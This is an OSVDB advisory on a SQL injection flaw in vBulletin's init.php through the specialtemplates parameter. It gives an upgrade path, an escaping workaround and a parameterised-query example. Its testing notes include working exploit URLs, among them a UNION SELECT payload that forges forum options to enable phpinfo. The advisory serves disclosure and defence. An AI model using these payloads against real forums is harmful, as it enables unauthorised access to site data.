vBulletin init.php SQL Injection

2005-01-02T07:09:55
ID OSVDB:12702
Type osvdb
Reporter al3ndaleeb(al3ndaleeb@uk2.net)
Modified 2005-01-02T07:09:55

Description

Vulnerability Description

vBulletin contains a flaw that allows an attacker to inject arbitrary SQL code. The specialtemplates variable in the init.php file is not properly validated before it is used in a query, which allows an attacker to inject into or manipulate SQL queries.

Solution Description

Upgrade to version 3.0.5 or higher, as it has been reported to fix this vulnerability.

It is also possible to correct the flaw with the following workaround. Open the init.php file and search for:

$datastoretemp = $DB_site->query("
    SELECT title, data
    FROM " . TABLE_PREFIX . "datastore
    WHERE title IN ('" . implode("', '", $specialtemplates) . "')
");
unset($specials, $specialtemplates);

Replace it with these lines:

// Stop if the value is not an array.
if (!is_array($specialtemplates)) exit;

// Escape every element before it is placed in the IN (...) list.
$specialtemplate = array();
foreach ($specialtemplates AS $arrykey => $arryval) {
    $specialtemplate[] = addslashes($specialtemplates["$arrykey"]);
}

$datastoretemp = $DB_site->query("
    SELECT title, data
    FROM " . TABLE_PREFIX . "datastore
    WHERE title IN ('" . implode("', '", $specialtemplate) . "')
");

unset($specials, $specialtemplates, $specialtemplate);
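
The workaround above depends on escaping every array element by hand. As an added example (not vBulletin code and not part of the original advisory), here is the same lookup written with bound parameters, so the titles never become part of the SQL text. It assumes PDO with the pdo_sqlite driver; fetch_datastore(), the unprefixed datastore table and the sample rows are hypothetical:

```php
<?php
// Added example, not vBulletin code. Assumes PDO with the pdo_sqlite driver;
// fetch_datastore() and the sample rows are constructed for illustration.

function fetch_datastore(PDO $db, $titles): array
{
    // Same type check as the workaround: reject anything that is not an array.
    if (!is_array($titles)) {
        throw new InvalidArgumentException('specialtemplates must be an array');
    }
    // Keep only string elements, so nested arrays cannot reach the query.
    $titles = array_values(array_filter($titles, 'is_string'));
    if ($titles === []) {
        return [];
    }
    // One "?" per title: values are bound, never concatenated into the SQL text.
    $marks = implode(', ', array_fill(0, count($titles), '?'));
    $stmt = $db->prepare("SELECT title, data FROM datastore WHERE title IN ($marks)");
    $stmt->execute($titles);
    return $stmt->fetchAll(PDO::FETCH_KEY_PAIR);
}

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE datastore (title TEXT PRIMARY KEY, data TEXT)");
$db->exec("INSERT INTO datastore VALUES ('options', 'real-options'), ('forumcache', 'real-cache')");

// Legitimate request: both rows come back.
var_dump(fetch_datastore($db, ['options', 'forumcache']));

// Constructed hostile value modelled on the advisory's test string: it is
// compared as a literal title, matches no row, and adds no UNION branch.
var_dump(fetch_datastore($db, ["x') UNION SELECT 'options' AS title, 'forged' AS data/*"]));

// Scalar instead of array: rejected before any SQL is built.
try {
    fetch_datastore($db, "x')");
} catch (InvalidArgumentException $e) {
    echo $e->getMessage(), "\n";
}
```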

Manual Testing Notes

An exploit example:

http://[victim]/forum/global.php?specialtemplates=al3ndaleeb')

http://[victim]/forum/global.php?do=phpinfo&specialtemplates[]=al3ndaleeb') UNION SELECT concat('options') as title,concat('a:4:{s:15:"templateversion";s:5:"3.0.3";s:12:"allowphpinfo";s:1:"1";s:10:"languageid";s:1:"1";s:7:"styleid";s:1:"1";}') as data/*

References:

Vendor URL: http://www.vbulletin.com/
Vendor Specific Solution URL: http://www.vbulletin.com/forum/showthread.php?postid=791268
Other Advisory URL: http://beyonce.beyondsecurity.com/unixfocus/5HP050KEKM.html